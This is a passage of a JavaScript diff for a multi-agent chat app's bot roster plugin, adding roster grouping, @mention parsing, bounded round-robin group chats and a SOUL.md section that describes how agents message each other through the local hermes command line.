+    // Mount the session view FIRST, then send the kickoff — submitting into
+    // an unmounted session left the intro reply invisible until reopen.
+    let opened = false
+
+    if (sid && typeof host.openSession === 'function') {
+      try {
+        await host.openSession(sid, { profile: name })
+        opened = true
+      } catch {
+        // The stored row may not exist until the kickoff persists it. Retry
+        // after prompt.submit below instead of leaving the chat off-screen.
+      }
+    }
+
+    if (runtime) {
+      await new Promise(resolve => window.setTimeout(resolve, 400))
+
+      try {
+        await host.request('prompt.submit', { session_id: runtime, text: 'Hey, tell me about yourself!' })
+
+        if (!opened && sid && typeof host.openSession === 'function') {
+          await host.openSession(sid, { profile: name })
+        }
+      } catch (err) {
+        if (sid) {
+          saveBotMeta(name, { chat: null })
+        }
+
+        throw err
+      }
+    }
+
+    return sid || null
+  })().finally(() => canonicalCreations.delete(name))
+
+  canonicalCreations.set(name, run)
+
+  return run
+}
+
+async function openBotCanonicalChat(name, pinned) {
+  let id = pinned
+
+  if (!id) {
+    return createCanonicalChat(name)
+  }
+
+  try {
+    const res = await host.request('session.list', { profile: name, limit: 100 })
+    const rows = res?.sessions ?? []
+
+    if (!rows.length) {
+      saveBotMeta(name, { chat: null })
+      return createCanonicalChat(name)
+    }
+
+    if (!rows.some(session => session.id === id)) {
+      id = rows[0].id
+      saveBotMeta(name, { chat: id })
+    }
+  } catch {
+    // Gateway hiccup — try the stored pin as-is.
+  }
+
+  try {
+    await host.openSession(id, { profile: name })
+    return id
+  } catch {
+    // A rejected resume means the pin is unusable even if list recovery was
+    // inconclusive. Clear it first so a failed replacement can be retried.
+    saveBotMeta(name, { chat: null })
+    return createCanonicalChat(name)
+  }
+}
+
+function displayName(bot, meta) {
+  if (meta?.title?.trim()) {
+    return meta.title.trim()
+  }
+
+  // The primary profile is literally named "default" — as a bot identity
+  // that reads like nobody bothered. Present it as Hermes (the agent it is)
+  // unless the user gives it a real title.
+  if ((bot.name || '').trim().toLowerCase() === 'default' && !bot.title) {
+    return 'Hermes'
+  }
+
+  const raw = (bot.title || bot.name || '').replace(/[-_]+/g, ' ').trim()
+  return raw.replace(/\b\w/g, ch => ch.toUpperCase())
+}
+
+/** Filter by the two stable identities rendered in every roster row: the
+ * customizable display name and the profile's @handle. Keep the current
+ * activity order — search narrows the roster, it never re-ranks it. */
+function filterBots(roster, metaByName, query) {
+  const needle = query.trim().toLowerCase().replace(/^@/, '')
+
+  if (!needle) {
+    return roster
+  }
+
+  return roster.filter(bot => {
+    const display = displayName(bot, metaByName[bot.name]).toLowerCase()
+    const profile = (bot.name || '').toLowerCase()
+    const handle = botHandle(bot.name).toLowerCase()
+    return display.includes(needle) || profile.includes(needle) || handle.includes(needle)
+  })
+}
+
+function slugify(value) {
+  return value
+    .toLowerCase()
+    .replace(/[^a-z0-9_-]+/g, '-')
+    .replace(/^-+|-+$/g, '')
+    .slice(0, 64)
+}
+
+/** Partition an already-sorted roster into user-defined groups. Returns
+ *  [{ group: null | name, bots }] — ungrouped bots first (no separator),
+ *  then each group alphabetically (case-insensitive), preserving the
+ *  roster's own ordering (pin + recency) within every section. Groups are
+ *  a per-bot `group` string in bot meta, so they ride the existing
+ *  ui_meta sync to every machine. Empty sections are dropped, so a group
+ *  disappears when its last member leaves — no group registry to manage. */
+function groupRoster(roster, metaByName) {
+  const ungrouped = []
+  const byGroup = new Map()
+
+  for (const bot of roster) {
+    const group = (metaByName[bot.name]?.group || '').trim()
+
+    if (!group) {
+      ungrouped.push(bot)
+      continue
+    }
+
+    if (!byGroup.has(group)) {
+      byGroup.set(group, [])
+    }
+    byGroup.get(group).push(bot)
+  }
+
+  const sections = ungrouped.length ? [{ group: null, bots: ungrouped }] : []
+
+  for (const group of [...byGroup.keys()].sort((a, b) => a.localeCompare(b, undefined, { sensitivity: 'base' }))) {
+    sections.push({ group, bots: byGroup.get(group) })
+  }
+
+  return sections
+}
+
+/** Existing group names, alphabetical — feeds the Move-to-group dialog. */
+function knownGroups(metaByName) {
+  const names = new Set()
+
+  for (const meta of Object.values(metaByName || {})) {
+    const group = (meta?.group || '').trim()
+
+    if (group) {
+      names.add(group)
+    }
+  }
+
+  return [...names].sort((a, b) => a.localeCompare(b, undefined, { sensitivity: 'base' }))
+}
+
+// ── group chats: bounded round-robin coordination over a shared room log ─────
+//
+// Behavioral model (clean-room): a group conversation is ONE ordered room log
+// owned by the plugin. A user send triggers at most GROUP_CHAT_MAX_ROUNDS
+// serial round-robin rounds over the member roster — never parallel, no LLM
+// router. Who speaks each round is a deterministic @mention parse since the
+// last user message (mentioned members only, else everyone); whether a member
+// actually speaks is its own turn's choice — replying with exactly "(pass)"
+// (or nothing, or failing) is silence. Hard caps end every turn; a round in
+// which everyone passed means the conversation settled. Each member runs its
+// turn in its OWN persistent per-group Hermes session and is fed only the
+// room messages that are NEW since it last saw the room.
+
+const GROUP_CHAT_MAX_ROUNDS = 3
+const GROUP_CHAT_MAX_MESSAGES = 10
+const GROUP_CHAT_HISTORY_LIMIT = 24
+const GROUP_CHAT_MAX_MEMBERS = 6
+
+/** "(pass)" (loosely: pass / (pass) / pass.) or empty = the member stayed silent. */
+function isGroupPassText(text) {
+  const trimmed = String(text || '').trim()
+
+  if (!trimmed) {
+    return true
+  }
+
+  return /^\(?\s*pass\s*\)?\.?$/i.test(trimmed)
+}
+
+/** Deterministic @mention parse. Handles @name, @"two words" via display
+ *  titles, and @everyone/@all. Names match case-insensitively against member
+ *  profile names, display titles, and collapsed no-space forms. */
+function parseGroupChatMentions(text, members) {
+  const source = String(text || '')
+  const mentioned = new Set()
+  let everyone = false
+  const handles = new Map()
+
+  for (const member of members) {
+    const title = String(member.title || '').trim()
+    const forms = new Set([
+      member.name.toLowerCase(),
+      member.name.toLowerCase().replace(/[\s_-]+/g, ''),
+      ...(title
+        ? [title.toLowerCase(), title.toLowerCase().replace(/[\s_-]+/g, ''), title.split(/\s+/)[0].toLowerCase()]
+        : [])
+    ])
+
+    for (const form of forms) {
+      if (form) {
+        handles.set(form, member.name)
+      }
+    }
+  }
+
+  for (const match of source.matchAll(/@([a-z0-9][a-z0-9._-]*)/gi)) {
+    const handle = match[1].toLowerCase()
+
+    if (handle === 'everyone' || handle === 'all') {
+      everyone = true
+      continue
+    }
+
+    if (handle === 'user') {
+      continue
+    }
+
+    const resolved = handles.get(handle) || handles.get(handle.replace(/[._-]+/g, ''))
+
+    if (resolved) {
+      mentioned.add(resolved)
+    }
+  }
+
+  return { everyone, mentioned }
+}
+
+/** Members that should take a turn this round: everyone when no member is
+ *  @-mentioned in messages since the last user entry (or @everyone appears),
+ *  otherwise only the mentioned members. Recomputed every round so a member
+ *  pulled in mid-conversation joins the next round. */
+function resolveGroupResponders(log, members) {
+  let sinceLastUser = []
+
+  for (let i = log.length - 1; i >= 0; i--) {
+    if (log[i].from.kind === 'user') {
+      sinceLastUser = log.slice(i)
+      break
+    }
+  }
+
+  const mentioned = new Set()
+  let everyone = false
+
+  for (const entry of sinceLastUser) {
+    const parsed = parseGroupChatMentions(entry.text, members)
+
+    if (parsed.everyone) {
+      everyone = true
+    }
+
+    for (const name of parsed.mentioned) {
+      mentioned.add(name)
+    }
+  }
+
+  if (everyone || mentioned.size === 0) {
+    return members
+  }
+
+  return members.filter(member => mentioned.has(member.name))
+}
+
+/** Rotate the roster so a different member leads each round. */
+function rotateGroupSpeakers(members, round) {
+  if (members.length < 2) {
+    return members
+  }
+
+  const shift = round % members.length
+
+  return [...members.slice(shift), ...members.slice(0, shift)]
+}
+
+/** Room-log line as a member sees it: `Name (user): …` / `Name: …` /
+ *  `Name (you): …`. */
+function formatGroupChatLine(entry, viewerName) {
+  if (entry.from.kind === 'user') {
+    return `${entry.from.name || 'User'} (user): ${entry.text}`
+  }
+
+  const suffix = entry.from.name === viewerName ? ' (you)' : ''
+
+  return `${entry.from.name}${suffix}: ${entry.text}`
+}
+
+/** The full per-turn payload for one member: participation rules + the room
+ *  delta. Rules travel in the turn payload (not SOUL) so every existing bot
+ *  can join a group chat without a profile migration. */
+function buildGroupChatTurnPrompt({ groupName, members, viewer, deltaLines }) {
+  const peers = members.filter(m => m.name !== viewer.name)
+  const peerNames = peers.map(m => (m.title ? `${m.title} (@${m.name})` : `@${m.name}`)).join(', ')
+
+  return [
+    `[Group chat: "${groupName}"] You are @${viewer.name}, one participant in a group chat with ${peerNames || 'no one else yet'} and the user.`,
+    '',
+    'New messages in the room since your last turn (oldest first):',
+    ...deltaLines.map(line => `  ${line}`),
+    '',
+    'Rules for this room:',
+    '- Reply with ONE short conversational message (1-3 sentences) ONLY if you have something new worth adding: build on what was just said, claim or hand off work, answer a question aimed at you, or report a real result.',
+    '- If you have nothing new to add, reply with exactly "(pass)". Passing is good — it lets the conversation settle.',
+    '- Mention a teammate as @name to pull them in; mention @user only for a judgment call or a result the user needs. Do not repeat points already made.',
+    '- Never reveal content from your private 1:1 chats. Your reply text goes to the room verbatim — no preamble, no meta-commentary.'
+  ].join('\n')
+}
+
+/** Trim a room log + its watermarks to the retained window, keeping
+ *  watermark indices consistent with the trimmed array. */
+function trimGroupChatLog(log, watermarks, limit = GROUP_CHAT_HISTORY_LIMIT * 4) {
+  if (log.length <= limit) {
+    return { log, watermarks }
+  }
+
+  const drop = log.length - limit
+  const trimmed = {}
+
+  for (const [name, index] of Object.entries(watermarks || {})) {
+    trimmed[name] = Math.max(0, index - drop)
+  }
+
+  return { log: log.slice(drop), watermarks: trimmed }
+}
+
+/** Mutate one group's room state through the atom + persist the durable part. */
+function updateGroupChat(group, mutate) {
+  const all = { ...$groupChats.get() }
+  const current = all[group] || { log: [], watermarks: {}, epoch: 0, running: false }
+  const next = mutate({ ...current, log: [...current.log], watermarks: { ...current.watermarks } })
+  const bounded = trimGroupChatLog(next.log, next.watermarks)
+
+  next.log = bounded.log
+  next.watermarks = bounded.watermarks
+  all[group] = next
+  $groupChats.set(all)
+
+  try {
+    const durable = {}
+
+    for (const [name, room] of Object.entries(all)) {
+      durable[name] = { log: room.log, watermarks: room.watermarks, sessions: room.sessions || {} }
+    }
+
+    Promise.resolve(pluginCtx?.storage?.set?.('group-chats', durable)).catch(() => undefined)
+  } catch {
+    /* storage unavailable — room survives for this window only */
+  }
+
+  return next
+}
+
+function appendGroupChatEntry(group, from, text) {
+  const entry = { from, text: String(text).trim(), at: Date.now() }
+
+  updateGroupChat(group, room => {
+    room.log.push(entry)
+    return room
+  })
+
+  // Needs-you: a member addressing @user badges the group header.
+  if (from.kind === 'member' && /@user\b/i.test(entry.text)) {
+    $groupNeedsYou.set({ ...$groupNeedsYou.get(), [group]: true })
+  }
+
+  return entry
+}
+
+/** Ensure the member's per-group session exists and return a LIVE runtime
+ *  session id for it. Gateway-native: session.create mints the session
+ *  (lazy until its first message), session.resume by stored id — or by
+ *  title, which also covers rehydrated rooms whose sid was lost — reopens
+ *  it after restarts. */
+async function ensureGroupChatSession(group, memberName) {
+  const title = `Group: ${group}`
+  const room = $groupChats.get()[group] || {}
+  const known = room.sessions && room.sessions[memberName]
+
+  // Try resuming what we know (stored sid first, then title lookup).
+  for (const target of [known, title]) {
+    if (!target || target === true) {
+      continue
+    }
+
+    try {
+      const res = await host.request('session.resume', {
+        session_id: target,
+        profile: memberName,
+        omit_messages: true
+      })
+
+      if (res?.session_id) {
+        return { runtime: res.session_id, stored: res.session_key || known }
+      }
+    } catch {
+      /* fall through to create */
+    }
+  }
+
+  const created = await host.request('session.create', {
+    profile: memberName,
+    title,
+    ...($hideBotChats.get() ? { hidden: true } : {})
+  })
+  const stored = created?.stored_session_id || null
+
+  if (stored) {
+    updateGroupChat(group, r => {
+      r.sessions = { ...(r.sessions || {}), [memberName]: stored }
+      return r
+    })
+  }
+
+  return { runtime: created?.session_id || null, stored }
+}
+
+const GROUP_TURN_TIMEOUT_MS = 180000
+const GROUP_TURN_POLL_MS = 2000
+
+/** One member turn, gateway-native: submit the room delta as a prompt into
+ *  the member's per-group session, then poll the session until a NEW
+ *  assistant message lands (or timeout → pass). No shell composition. */
+async function runGroupChatMemberTurn(group, member, prompt) {
+  const { runtime, stored } = await ensureGroupChatSession(group, member.name)
+
+  if (!runtime) {
+    return null
+  }
+
+  // Baseline: how many messages exist before our submit.
+  let before = 0
+
+  try {
+    const pre = await host.request('session.resume', {
+      session_id: stored || runtime,
+      profile: member.name
+    })
+    before = Array.isArray(pre?.messages) ? pre.messages.length : pre?.message_count || 0
+  } catch {
+    /* lazy session — zero messages */
+  }
+
+  await host.request('prompt.submit', { session_id: runtime, text: prompt })
+
+  const deadline = Date.now() + GROUP_TURN_TIMEOUT_MS
+
+  while (Date.now() < deadline) {
+    await new Promise(resolve => setTimeout(resolve, GROUP_TURN_POLL_MS))
+
+    let state = null
+
+    try {
+      state = await host.request('session.resume', {
+        session_id: stored || runtime,
+        profile: member.name
+      })
+    } catch {
+      continue
+    }
+
+    const messages = Array.isArray(state?.messages) ? state.messages : []
+    const done = !state?.inflight && !state?.running
+
+    if (messages.length > before && done) {
+      for (let i = messages.length - 1; i >= 0; i--) {
+        const msg = messages[i]
+
+        if (msg?.role === 'assistant') {
+          const text = typeof msg.content === 'string'
+            ? msg.content
+            : Array.isArray(msg.content)
+              ? msg.content.map(p => (typeof p === 'string' ? p : p?.text || '')).join('')
+              : msg?.text || ''
+
+          return String(text).trim()
+        }
+      }
+
+      return null
+    }
+  }
+
+  return null // timeout — reads as a pass
+}
+
+/** Drive one bounded round-robin room turn. Serial — one member at a time.
+ *  A newer user send bumps the room epoch; this loop notices at the next
+ *  member boundary, bails, and the newest send's own loop takes over. */
+async function runGroupChatRounds(group, members) {
+  const startEpoch = ($groupChats.get()[group] || {}).epoch || 0
+  const isCurrent = () => (($groupChats.get()[group] || {}).epoch || 0) === startEpoch
+  let posted = 0
+
+  try {
+    for (let round = 0; round < GROUP_CHAT_MAX_ROUNDS; round++) {
+      const roomLog = ($groupChats.get()[group] || {}).log || []
+      const responders = rotateGroupSpeakers(resolveGroupResponders(roomLog, members), round)
+      let spokeThisRound = 0
+
+      for (const member of responders) {
+        if (!isCurrent() || posted >= GROUP_CHAT_MAX_MESSAGES) {
+          return
+        }
+
+        const room = $groupChats.get()[group] || { log: [], watermarks: {} }
+        const seen = room.watermarks[member.name] || 0
+        const delta = room.log.slice(seen)
+
+        if (!delta.length) {
+          continue
+        }
+
+        const prompt = buildGroupChatTurnPrompt({
+          groupName: group,
+          members,
+          viewer: member,
+          deltaLines: delta.slice(-GROUP_CHAT_HISTORY_LIMIT).map(e => formatGroupChatLine(e, member.name))
+        })
+
+        let reply = null
+
+        try {
+          reply = await runGroupChatMemberTurn(group, member, prompt)
+        } catch {
+          reply = null // a failed turn is a pass, never a room error
+        }
+
+        // The member has now seen everything up to the pre-reply log length.
+        updateGroupChat(group, r => {
+          r.watermarks[member.name] = r.log.length
+          return r
+        })
+
+        if (reply !== null && !isGroupPassText(reply)) {
+          appendGroupChatEntry(group, { kind: 'member', name: member.name }, reply)
+          // Its own message counts as seen too.
+          updateGroupChat(group, r => {
+            r.watermarks[member.name] = r.log.length
+            return r
+          })
+          posted += 1
+          spokeThisRound += 1
+        }
+      }
+
+      if (spokeThisRound === 0) {
+        return // everyone passed — the conversation settled
+      }
+    }
+  } finally {
+    if (isCurrent()) {
+      updateGroupChat(group, r => {
+        r.running = false
+        return r
+      })
+    }
+  }
+}
+
+/** User send into a group room: append, bump epoch (supersedes any running
+ *  loop at its next member boundary), and start the room turn unless one is
+ *  already running under the new epoch semantics. */
+function sendToGroupChat(group, members, text) {
+  const trimmed = String(text || '').trim()
+
+  if (!trimmed || !members.length) {
+    return
+  }
+
+  $groupNeedsYou.set({ ...$groupNeedsYou.get(), [group]: false })
+  appendGroupChatEntry(group, { kind: 'user', name: 'You' }, trimmed)
+
+  const wasRunning = ($groupChats.get()[group] || {}).running === true
+
+  updateGroupChat(group, room => {
+    room.epoch = (room.epoch || 0) + 1
+    room.running = true
+    return room
+  })
+
+  if (!wasRunning) {
+    void runGroupChatRounds(group, members).catch(() => {
+      updateGroupChat(group, r => {
+        r.running = false
+        return r
+      })
+    })
+  } else {
+    // A loop is live; it bails at its next boundary. Chain the fresh loop
+    // after a short settle so exactly one drive owns the room.
+    setTimeout(() => {
+      void runGroupChatRounds(group, members).catch(() => {
+        updateGroupChat(group, r => {
+          r.running = false
+          return r
+        })
+      })
+    }, 250)
+  }
+}
+
+/** Share one in-flight async operation across concurrent callers. Failures
+ * clear the slot so a later attempt can retry. */
+function singleFlight(ref, start) {
+  if (ref.current) {
+    return ref.current
+  }
+
+  let flight
+  try {
+    flight = Promise.resolve(start())
+  } catch (err) {
+    flight = Promise.reject(err)
+  }
+  ref.current = flight
+  flight.catch(() => {
+    if (ref.current === flight) {
+      ref.current = null
+    }
+  })
+  return flight
+}
+
+/** The agent-to-agent messaging protocol, reusable so a CUSTOM SOUL keeps
+ *  the handoff protocol too — a custom SOUL used to silently drop it,
+ *  breaking @mentions for customized bots (@wesleysimplicio, #16). */
+function messagingProtocolSection(name, roster) {
+  const teammates = (roster || []).filter(b => b.name !== name)
+  const handle = botHandle(name)
+
+  return [
+    '## Messaging other agents',
+    '',
+    'You work alongside other named agents. Every agent (including you) has',
+    'ONE canonical conversation titled "Bot Chat" — created with the agent,',
+    'so it always exists. Agent-to-agent messages are delivered straight',
+    'into it, like a DM. To message a teammate, run:',
+    '',
+    '```',
+    'hermes -p <agent-name> chat --in ~ -c "Bot Chat" -Q -q "Message from \uD83E\uDD16 ' + handle + ' (@' + handle + '): your message"',
+    '',
+    'Run the send with background=true and notify_on_complete=true on the',
+    'terminal tool, then finish your turn — the reply arrives later as a',
+    'background process notification. Never block waiting for it.',
+    '```',
+    '',
+    '(`--in ~ -c "Bot Chat"` resumes their canonical conversation in the home',
+    'workspace. `-Q` keeps output clean. Always open with the',
+    '"Message from \uD83E\uDD16 ' + handle + ' (@' + handle + '):" prefix so they know',
+    'who is talking (the @handle lets the app show your avatar to them).',
+    'Their reply prints to stdout — relay the relevant part back to the',
+    'user, and say which agent it came from. In the rare case the target',
+    'has no "Bot Chat" yet, send once WITHOUT -c, then',
+    '`hermes -p <agent-name> sessions rename <session-id> "Bot Chat"`.)',
+    '',
+    'If a message in YOUR chat starts with "Message from \uD83E\uDD16 <name>", it is',
+    'a teammate messaging you, not the user. Answer it directly — your reply',
+    'reaches them via their own delivery — and use the same command if you',
+    'need to start a conversation yourself.',
+    '',
+    'When the user writes @<agent-name> or says "ask <name> to ..." /',
+    '"tell <name> ...", that is a handoff: message that agent, wait for the',
+    'reply, and report back.',
+    '',
+    'The roster grows over time — run `hermes profile list` for the LIVE',
+    'teammate list before a handoff. Teammates when you were created:',
+    ...(teammates.length
+      ? teammates.map(b => `- \`${b.name}\`${b.description ? ` — ${b.description}` : ''}`)
+      : ['- (none yet)'])
+  ].join('\n')
+}
+
+/** True when SOUL.md already carries the Bot Mode handoff section.
+ *  #16 appends this at create-time; pre-existing profiles (especially
+ *  `default`) never went through composeSoul and silently lack it. */
+function hasMessagingProtocol(soul) {
+  return /(^|\n)## Messaging other agents(\s|$)/.test(soul || '')
+}
+
+/** Idempotent: append the protocol once, never duplicate a custom SOUL
+ *  that already has it (clone-from-default after a backfill, Edit save).
+ *  No-op when the backend injects the protocol into the system prompt
+ *  itself (bot_mode_protocol) — SOUL.md stays the user's identity text. */
+function ensureMessagingProtocol(soul, name, roster) {
+  const text = (soul || '').trim()
+  if (serverInjectsProtocol || hasMessagingProtocol(text)) return text
+  const section = messagingProtocolSection(name, roster)
+  return text ? text + '\n\n' + section : section
+}
+
+const soulProtocolChecked = new Set()
+const soulProtocolInflight = new Set()
+
+/** One-shot per profile per session: if an existing SOUL has no protocol,
+ *  append it. This is the install-time fix for default / pre-Bot-Mode
+ *  personas that #16 never touched. Never overwrites identity text. */
+function backfillMessagingProtocol(roster) {
+  // Newer backends teach the protocol via the system prompt — never touch
+  // user SOUL files when the server already covers every session.
+  if (serverInjectsProtocol) {
+    return
+  }
+
+  for (const bot of roster || []) {
+    const name = bot && bot.name
+    if (!name || soulProtocolChecked.has(name) || soulProtocolInflight.has(name)) {
+      continue
+    }
+
+    soulProtocolInflight.add(name)
+    host
+      .request('profiles.describe', { name })
+      .then(res => {
+        const soul = (res && res.soul) || ''
+        if (hasMessagingProtocol(soul)) {
+          soulProtocolChecked.add(name)
+          return null
+        }
+        return host
+          .request('profiles.configure', { name, soul: ensureMessagingProtocol(soul, name, roster) })
+          .then(() => {
+            soulProtocolChecked.add(name)
+          })
+      })
+      .catch(() => {
+        // Older gateway or a one-off describe/configure miss — do not hammer.
+        soulProtocolChecked.add(name)
+      })
+      .finally(() => {
+        soulProtocolInflight.delete(name)
+      })
+  }
+}
+
+/** SOUL.md for a new bot: identity (or the user's custom SOUL) + the
+ *  messaging protocol, which ALWAYS ships. */
+function composeSoul({ name, title, description, roster, customSoul }) {
+  if (customSoul && customSoul.trim()) {
+    return ensureMessagingProtocol(customSoul, name, roster)
+  }
+
+  const lines = [
+    `# ${displayName({ name, title })}`,
+    '',
+    title ? `**Role:** ${title}` : null,
+    description ? `**Mission:** ${description}` : null,
+    '',
+    `You are ${displayName({ name, title })}, a persistent named agent (profile \`${name}\`) on this machine.`,
+    'You keep your own memory, skills, and conversation history across sessions.'
+  ]
+
+  return lines.filter(line => line !== null).join('\n') + '\n\n' + messagingProtocolSection(name, roster)
+}
+
+// ── human-readable row helpers ───────────────────────────────────────────────
+
+/** Bot-to-bot delivery prefix (see messagingProtocolSection): either the
+ *  current "Message from 🤖 name (@handle):" form or the older
+ *  "[Message from agent 'name']" shape. Captures the sender's handle. */
+const A2A_RE = /^Message from (?:agent '([^']+)'|🤖\s*([^\s(@]+))/i
+
+/** Strip the delivery prefix so a DM preview reads like a DM, not a log line. */
+const A2A_PREFIX_RE = /^Message from (?:agent '[^']+'|🤖[^:]+):\s*/i
+
+/** Classify a roster preview: `{ fromBot: handle|null }`. A preview that
+ *  starts with the delivery prefix is a bot-to-bot message — the receiving
+ *  bot's row should show WHO sent it, not present it as the human's chat. */
+function previewKind(preview) {
+  const text = (preview || '').trim()
+  if (!text) {
+    return { fromBot: null }
+  }
+  const match = text.match(A2A_RE)
+  if (match) {
+    return { fromBot: (match[1] || match[2] || '').trim().toLowerCase() || null }
+  }
+  return { fromBot: null }
+}
+
+/** Session titles the gateway auto-assigns that carry no information. */
+const GENERIC_TITLES = new Set(['', 'bot chat', 'new chat', 'new conversation', 'conversation', 'chat', 'untitled'])
+
+function isGenericTitle(title) {
+  return GENERIC_TITLES.has((title || '').trim().toLowerCase())
+}
+
+/** Title for the session chip: the real session title when it means
+ *  something, otherwise a short label generated from the newest message
+ *  (delivery prefixes stripped) so "Bot Chat" rows still say what the
+ *  conversation is actually about. */
+function generatedSessionTitle(session, preview) {
+  const raw = (session?.title || '').trim()
+  if (raw && !isGenericTitle(raw)) {
+    return raw
+  }
+  const cleaned = (preview || '').trim().replace(A2A_PREFIX_RE, '').trim()
+  if (!cleaned) {
+    return raw || 'Conversation'
+  }
+  const words = cleaned.split(/\s+/).slice(0, 5).join(' ').replace(/[,;:.]+$/, '')
+  if (!words) {
+    return raw || 'Conversation'
+  }
+  return words.length > 34 ? `${words.slice(0, 33)}…` : words
+}
+
+/** Roster liveness window: a bot whose last message landed within this many
+ *  seconds is treated as "active now" (pulsing dot in its row). */
+const ACTIVE_WINDOW_S = 90
+
+/** Bots that are working right now: the profile the gateway is running a
+ *  turn for (busy), plus any bot whose last message landed inside the
+ *  liveness window. Pure — output follows the input roster's order, so
+ *  presence never reorders or hides the normal list. */
+function activeBots(roster, activeProfile, gatewayState, now = Date.now()) {
+  return (roster || []).filter(bot => {
+    const busyTurn = bot.name === activeProfile && gatewayState === 'busy'
+    const last = bot.last_session?.last_active || 0
+    const inWindow = Boolean(last && now / 1000 - last < ACTIVE_WINDOW_S)
+
+    return busyTurn || inWindow
+  })
+}
+
+// ── bot row ──────────────────────────────────────────────────────────────────
+
+function BotRow({ bot, onDelete, onEdit, onGroup }) {
+  const activeProfile = useValue(host.state.profile)
+  const meta = useValue($botMeta)[bot.name]
+  const last = bot.last_session
+  const isActive = bot.name === activeProfile
+  const { shape, color, image } = botAppearance(bot.name, meta)
+  // Keep user photos/pets. Drop the 160px SVG backfill so the math face can move.
+  const photo = Boolean(image && !isBackfilledFacePng(image))
+  const gatewayState = useValue(host.state.gateway)
+  const activeNow = Boolean(last?.last_active && Date.now() / 1000 - last.last_active < ACTIVE_WINDOW_S)
+  // Work pose only when this bot is actually doing something: the active
+  // profile while the gateway is busy, or a bot that wrote within the
+  // liveness window. Not every bot whenever the gateway is busy.
+  const botMood = (isActive && gatewayState === 'busy') || activeNow ? 'work' : 'idle'
+  const unread = Boolean(useValue($botUnread)[bot.name])
+  // WHO sent the last message (bot-to-bot DM vs human) — the full stored
+  // history lives in the Sessions workspace (context menu), not inline.
+  const { fromBot } = previewKind(last?.preview)
+  // DM previews read like DMs: strip the delivery prefix, keep the message.
+  const displayPreview = fromBot
+    ? (last?.preview || '').replace(A2A_PREFIX_RE, '').trim() || '…'
+    : last?.preview || bot.description || 'No conversations yet — say hi'
+
+  const warm = () => {
+    if (typeof host.warmProfile !== 'function') {
+      return
+    }
+
+    try {
+      host.warmProfile(bot.name)
+    } catch {
+      /* warm is best-effort */
+    }
+  }
+
+  const open = async () => {
+    haptic('tap')
+    $selectedBot.set(bot.name)
+
+    if ($botUnread.get()[bot.name]) {
+      const next = { ...$botUnread.get() }
+      delete next[bot.name]
+      $botUnread.set(next)
+    }
+
+    try {
+      const id = await openBotCanonicalChat(bot.name, meta?.chat)
+
+      if (id) {
+        return
+      }
+    } catch {
+      // Fall through to the older-gateway draft below.
+    }
+
+    if (typeof host.newChat === 'function') {
+      // Older gateway without profile-scoped session.create — plain draft.
+      host.newChat(bot.name)
+    } else {
+      host.navigate('/')
+    }
+  }
+
+  const row = jsxs('button', {
+    type: 'button',
+    onPointerEnter: warm,
+    onClick: open,
+    className: cn(
+      'flex w-full min-w-0 max-w-full items-center gap-2.5 overflow-hidden rounded-md px-2 py-2 text-left transition-colors',
+      'hover:bg-(--chrome-action-hover)',
+      isActive && 'bg-(--chrome-action-hover)'
+    ),
+    children: [
+      jsx('div', {
+        className: 'shrink-0',
+        children: jsx(BotFace, { shape, color, image: photo ? image : null, size: 34, name: bot.name, mood: botMood })
+      }),
+      jsxs('div', {
+        className: 'min-w-0 flex-1',
+        children: [
+          jsxs('div', {
+            className: 'flex items-baseline justify-between gap-2',
+            children: [
+              jsxs('div', {
+                className: 'flex min-w-0 items-baseline gap-1.5 truncate',
+                children: [
+                  meta?.pinned
+                    ? jsx('span', {
+                        className: 'shrink-0 text-[0.6875rem] text-(--ui-text-quaternary)',
+                        title: 'Pinned',
+                        children: '📌'
+                      })
+                    : null,
+                  jsx('span', {
+                    className: 'truncate text-[0.8125rem] font-medium',
+                    children: displayName(bot, meta)
+                  }),
+                  showsHandle(bot.name, meta)
+                    ? jsx('span', {
+                        className: 'shrink-0 font-mono text-[0.6875rem] text-(--ui-text-quaternary)',
+                        children: `@${botHandle(bot.name)}`
+                      })
+                    : null
+                ]
+              }),
+              unread
+                ? jsx('span', {
+                    className: 'size-2 shrink-0 rounded-full bg-(--ui-accent,#4f9cf9)',
+                    'aria-label': 'unread'
+                  })
+                : null,
+              activeNow
+                ? jsx('span', {
+                    className: 'hermes-bots-pulse size-1.5 shrink-0 rounded-full bg-(--ui-accent,#4f9cf9)',
+                    title: 'Active in the last 90s'
+                  })
+                : null,
+              last
+                ? jsx('span', {
+                    className: 'shrink-0 text-[0.6875rem] text-(--ui-text-quaternary)',
+                    children: relativeTime(last.last_active * 1000)
+                  })
+                : null
+            ]
+          }),
+          jsxs('div', {
+            className: 'flex min-w-0 items-center gap-1',
+            children: [
+              jsx('div', {
+                className: fromBot
+                  ? 'min-w-0 truncate text-xs italic text-(--ui-accent,#4f9cf9)'
+                  : 'min-w-0 truncate text-xs text-(--ui-text-tertiary)',
+                children: displayPreview
+              }),
+              fromBot
+                ? jsxs('span', {
+                    className:
+                      'flex shrink-0 items-center gap-1 rounded-full bg-(--chrome-action-hover) px-1.5 py-px text-[0.625rem] font-medium text-(--ui-accent,#4f9cf9)',
+                    title: `Last message came from @${fromBot} (bot-to-bot)`,
+                    children: ['🤖', `@${fromBot}`]
+                  })
+                : null
+            ]
+          })
+        ]
+      })
+    ]
+  })
+
+  return jsxs(ContextMenu, {
+    children: [
+      jsx(ContextMenuTrigger, { asChild: true, children: row }),
+      jsxs(ContextMenuContent, {
+        children: [
+          jsx(ContextMenuItem, {
+            onSelect: () => {
+              const pinned = Boolean($botMeta.get()[bot.name]?.pinned)
+              saveBotMeta(bot.name, { pinned: !pinned })
+              host.notify({
+                kind: 'info',
+                message: `${displayName(bot, meta)} ${pinned ? 'unpinned' : 'pinned to top'}`
+              })
+            },
+            children: meta?.pinned ? 'Unpin' : 'Pin to top'
+          }),
+          jsx(ContextMenuSeparator, {}),
+          jsx(ContextMenuItem, {
+            onSelect: () => openBotSessionsWorkspace(bot),
+            children: 'Sessions'
+          }),
+          jsx(ContextMenuItem, { onSelect: () => onEdit(bot), children: 'Edit Profile' }),
+          jsx(ContextMenuItem, {
+            onSelect: () => onGroup(bot),
+            children: meta?.group ? `Group: ${meta.group}…` : 'Move to group…'
+          }),
+          jsx(ContextMenuItem, {
+            onSelect: () => {
+              host.notify({ kind: 'info', message: `Duplicating ${displayName(bot, meta)}…` })
+              duplicateBot(bot, $lastRoster.get())
+                .then(name => {
+                  queryClient.invalidateQueries({ queryKey: ROSTER_KEY })
+                  host.notify({ kind: 'success', message: `Created ${name} — full copy of ${bot.name}` })
+                })
+                .catch(err => host.notifyError(err, 'Duplicate failed'))
+            },
